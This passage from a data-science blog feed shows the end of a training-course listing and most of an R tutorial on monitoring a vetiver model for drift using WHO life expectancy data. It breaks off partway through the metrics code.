&lt;p&gt;We use the &lt;a href="https://www.postgresql.org/" rel="external"&gt;PostgreSQL&lt;/a&gt; database as an example for public courses. For in-house training, we are happy to adapt the course to match your database requirements.&lt;/p&gt;
&lt;h4 id="introduction-to-sql-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-sql-databases-pandas-sqlalchemy/" rel="external"&gt;Introduction to SQL with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th April 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using databases is a fundamental part of a data scientist’s role. &lt;a href="https://www.jumpingrivers.com/training/course/python-sql-databases-pandas-sqlalchemy/" rel="external"&gt;This training course&lt;/a&gt; introduces SQL databases and the SQL command syntax, and shows how Python can be used to retrieve and manipulate data held in a relational database. The course also discusses how SQLAlchemy can be used to define and interact with databases using object-oriented Python code.&lt;/p&gt;
&lt;p&gt;We use a &lt;a href="https://www.postgresql.org/" rel="external"&gt;PostgreSQL&lt;/a&gt; database as an example, and communicate with this using a psycopg2 connection.&lt;/p&gt;
&lt;h3 id="so-what-now"&gt;So what now?&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;re interested in attending any of our public courses, then you can head straight over to the &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;public booking page&lt;/a&gt;! If you&amp;rsquo;re looking for training for your team, or maybe even something a bit more bespoke, then &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;get in touch&lt;/a&gt; and we&amp;rsquo;ll see what we can do! All of our training courses (including courses not mentioned above) can be found in our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course catalogue&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/training-lineup-2025-r-python-bayesian-statistics-machine-learning/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Vetiver: Monitoring Models in Production</title><link>https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/</link><pubDate>Thu, 31 Oct 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This post is the third in our series of blogs on MLOps with vetiver:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/"&gt;Vetiver: First steps in
MLOps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/"&gt;Vetiver: Model
Deployment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: Vetiver: Monitoring Models in Production (this post)&lt;/li&gt;
&lt;li&gt;Part 4: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment"&gt;Vetiver: MLOps for Python&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In Parts 1 and 2, we introduced the {vetiver} package and its use as a
tool for streamlined MLOps. Using the {palmerpenguins} dataset as an
example, we outlined the steps of training a model using {tidymodels}
then converting this into a {vetiver} model. We then demonstrated the
steps of versioning our trained model and deploying it into production.&lt;/p&gt;
&lt;p&gt;Getting your first model into production is great! But it’s really only
the beginning, as you will now have to carefully monitor it over time to
ensure that it continues to perform as expected on the latest data.
Thankfully, {vetiver} comes with a suite of functions for this exact
purpose!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-vetiver-monitoring-mlops-deployment"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="preparing-the-data"&gt;Preparing the data&lt;/h2&gt;
&lt;p&gt;A crucial step in the monitoring process is the introduction of a time
component. We will be tracking key scoring metrics over time as new data
is collected, therefore our analysis will now depend on a time dimension
even if our deployed model has no explicit time dependence.&lt;/p&gt;
&lt;p&gt;To demonstrate the monitoring steps, we will be working with the &lt;a href="https://www.kaggle.com/datasets/kumarajarshi/life-expectancy-who/data" rel="external"&gt;World
Health Organisation Life
Expectancy&lt;/a&gt;
data which tracks the average life expectancy in various countries over
a number of years. We start by loading the data:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;download.file&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://www.kaggle.com/api/v1/datasets/download/kumarajarshi/life-expectancy-who&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;archive.zip&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unzip&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;archive.zip&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; readr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;./Life Expectancy Data.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will attempt to predict the life expectancy using the percentage
expenditure, total expenditure, population, body-mass-index (BMI) and
schooling. Let’s select the columns of interest, tidy up the variable
names and drop any missing values:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; janitor&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;clean_names&lt;/span&gt;(case &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;snake&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; abbreviations &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;BMI&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;life_expectancy&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;percentage_expenditure&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;total_expenditure&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;population&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bmi&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;schooling&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tidyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;life_expectancy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 2,111 × 7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; year life_expectancy percentage_expenditure total_expenditure population&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 2015 65 71.3 8.16 33736494&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 2014 59.9 73.5 8.18 327582&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 2013 59.9 73.2 8.13 31731688&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 2012 59.5 78.2 8.52 3696958&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 5 2011 59.2 7.10 7.87 2978599&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 6 2010 58.8 79.7 9.2 2883167&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 7 2009 58.6 56.8 9.42 284331&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 8 2008 58.1 25.9 8.33 2729431&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 9 2007 57.5 10.9 6.73 26616792&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 10 2006 57.3 17.2 7.43 2589345&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # ℹ 2,101 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # ℹ 2 more variables: bmi &amp;lt;dbl&amp;gt;, schooling &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The data contains a numeric &lt;code&gt;year&lt;/code&gt; column which will come in handy for
monitoring the model performance over time. However, the {vetiver}
monitoring functions will require this column to use &lt;code&gt;&amp;lt;date&amp;gt;&lt;/code&gt;
(&lt;code&gt;&amp;quot;YYYY-MM-DD&amp;quot;&lt;/code&gt;) formatting and it will have to be sorted in ascending
order:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lubridate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ymd&lt;/span&gt;(year, truncated &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2L&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(year)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;life_expectancy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 2,111 × 7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; year life_expectancy percentage_expenditure total_expenditure&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;date&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 2000-01-01 54.8 10.4 8.2 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 2000-01-01 72.6 91.7 6.26&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 2000-01-01 71.3 154. 3.49&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 2000-01-01 45.3 15.9 2.79&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 5 2000-01-01 74.1 1349. 9.21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 6 2000-01-01 72 32.8 6.25&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 7 2000-01-01 79.5 347. 8.8 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 8 2000-01-01 78.1 3557. 1.6 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 9 2000-01-01 66.6 35.1 4.67&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 10 2000-01-01 65.3 3.70 2.33&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # ℹ 2,101 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # ℹ 3 more variables: population &amp;lt;dbl&amp;gt;, bmi &amp;lt;dbl&amp;gt;, schooling &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, let’s imagine the year is currently 2002, so our historical
training data should only cover the years 2000 to 2002:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;historic_life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;2002-01-01&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Later in this post we will check how our model performs on more recent
data to illustrate the effects of model drift.&lt;/p&gt;
&lt;h2 id="training-our-model"&gt;Training our model&lt;/h2&gt;
&lt;p&gt;Before we start training our model, we should split the data into
“train” and “test” sets:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidymodels&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data_split &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; rsample&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;initial_split&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; historic_life_expectancy,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prop &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;train_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; rsample&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;training&lt;/span&gt;(data_split)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; rsample&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;testing&lt;/span&gt;(data_split)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The test set makes up 30% of the original data and will be used to score
the model on unseen data following training.&lt;/p&gt;
&lt;p&gt;The code cell below handles the steps of setting up a trained model in
{vetiver} and versioning it using {pins}. For a more detailed
explanation of what this code is doing, we refer the reader back to
&lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/" rel="external"&gt;Part
1&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We will again use a basic &lt;em&gt;K&lt;/em&gt;-nearest-neighbour model, although this
time we have set up the workflow as a regression model since we are
predicting a continuous quantity. Note that this requires the {kknn}
package to be installed.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Train the model with {tidymodels}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;recipe&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; percentage_expenditure &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; total_expenditure &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; population &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; bmi &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; schooling,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; train_data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;workflow&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;nearest_neighbor&lt;/span&gt;(mode &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;regression&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fit&lt;/span&gt;(train_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Convert to a {vetiver} model&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;v_model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_model&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;k-nn&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; description &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;life-expectancy&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Store the model using {pins}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_board &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;board_temp&lt;/span&gt;(versioned &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_pin_write&lt;/span&gt;(model_board, v_model)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here the model {pins} board is created using &lt;code&gt;pins::board_temp()&lt;/code&gt; which
generates a temporary local folder.&lt;/p&gt;
&lt;p&gt;At this point we should check how our model performs on the unseen test
data. The maximum absolute error (&lt;code&gt;mae&lt;/code&gt;), root-mean-squared error
(&lt;code&gt;rmse&lt;/code&gt;) and &lt;em&gt;R&lt;/em&gt;&lt;sup&gt;2&lt;/sup&gt; (&lt;code&gt;rsq&lt;/code&gt;) can be computed over a specified
time period using &lt;code&gt;vetiver::vetiver_compute_metrics()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;metrics &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;augment&lt;/span&gt;(v_model, new_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; test_data) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_compute_metrics&lt;/span&gt;(
